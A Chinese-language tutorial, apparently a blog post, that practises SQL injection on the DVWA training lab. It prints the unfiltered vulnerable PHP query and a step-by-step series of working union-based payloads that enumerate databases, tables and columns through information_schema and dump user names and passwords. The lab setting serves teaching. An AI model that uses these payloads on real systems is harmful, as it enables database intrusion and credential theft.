关于sql注入的基础知识,我上篇文章也写过了,这篇就用靶机的漏洞环境来实践操作一下,所谓实践出真理嘛,我们这次试用的漏洞平台是DVWA,Github下载地址:DVWA
关于一下注入的基本知识或者姿势,我会在实践中详解。
LOW等级
先输入1看一下
我们在加个单引号
这里的搜索框为什么没有显示单引号呢?因为被url编码了
一般的url编码其实就是那个字符的ASCII值得十六进制,再在前面加个%。
具体可以看URL编码,这里可以查到每个字符的url编码,当然自己编程或者用该语言应该也有自带的函数,去实现url编码。
这里说下sql注入中常见的url编码:
空格是%20
单引号是%27
井号是%23(表注释)
双引号是%22
看报错我们能看到,这是由' '两个单引号扩起来的参数,看看源代码
我们看
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"
$id = $_REQUEST[ 'id' ];
参数没有经过任何的过滤....我们尝试闭合单引号。
比如我们输入id=1' or '1'='1
语句就变成了
$query = "SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'='1';";
当然,我们也可以使用注释来注释后面的单引号
sql中注释 单行可以使用 #(忽略) --(忽略),多行使用/ /
我们试试1' #
下面我们来利用漏洞获取数据库信息
大概步骤就是:
1.猜解所查询的字段数目
2.获取字段显示位
3.通过显示位获取数据库信息
4.获取数据库中的表名
5.获取表中的列名(字段)
6.导出数据库中的数据
7.验证导出数据的有效性
猜解所查询的字段数
方式1: order by num
若num数值超过了字段数,则查询会报错,从而判断出select语句所查询字段的数目
输入:1' order by 2 #
1' order by 3 #
报错,说明数据表中只有两个字段
方式二:union select 1,2,3...
若union select后的数字位(不一定是1/2/3,只要有数字占位即可)与实际查询的字段位不完全对应时,查询就会报错,直至调整到不报错时的占位个数,从而判断实际查询的字段数
输入:union select 1,2 #
输入:union select 1,2.3 #
获取字段的显示位1' union select 1,2 #
既然显示位显示的是我们设定数值,那么我们就通过显示位获取数据,输出出来
通过显示位获取数据库信息
此处会用到Mysql注入常用的一些函数,可参看此文==>SQL注入常用的内置函数整理(以MySql为例)
获取当前连接的数据库名称、DBMS的版本(Mysql的版本)1' union select database(),version() #
获取当前连接数据库的用户1' union select 1,user() #
获取服务器的操作系统、数据库的存储目录1' union select @@version_compile_os,@@datadir #
获取数据库中所有数据库名
在此之前,科普一下数据库的知识
mysql的数据库information_schema,他是系统数据库,安装完就有,记录是当前数据库的数据库,表,列,用户权限等信息
information_schema.schemata 记录所有的数据库名称
Information_schema.tables: 记录表名信息的表(也有数据库名字段)
Information_schema.columns: 记录列名信息的表(数据库名、表名、字段名)1' union select 1,schema_name from information_schema.schemata #
可能是权限问题,没有全部爆出来
去数据库执行是这样的
我们发现数据库dvwa正是我们想要的,因此,通过此数据库,去爆表
获取当前连接数据库(dvwa)中的所有表1' union select 1,table_name from information_schema.tables where table_schema="dvwa" #
where .. 后面表示的限制的条件,只查数据库名是dvwa的表
获取表中的列名(字段)1' union select 1,column_name from information_schema.columns where table_name="users" #
这样输出有点乱,我们使用group_concat()
将他们简单的输出出来1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" #
如果你觉得有点挤,看的不舒服的话,你可以1' union select 1,group_concat(column_name,' ') from information_schema.columns where table_name="users" #
这样是不是就明显多了?关于group_concat()
,还有concat()
可以自行百度学习
知道了数据库的表名、字段名就可以爆表了
爆表1' union select 1,concat(user,'--',password) from users #
还有其他更多的导出操作,一些导出函数的使用,可以自行尝试
验证导出数据的有效性
OK!!
Medium
只是闭合方式不同
其余操作步骤与上差不多
high
想办法闭合,其他就自然好起来了!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。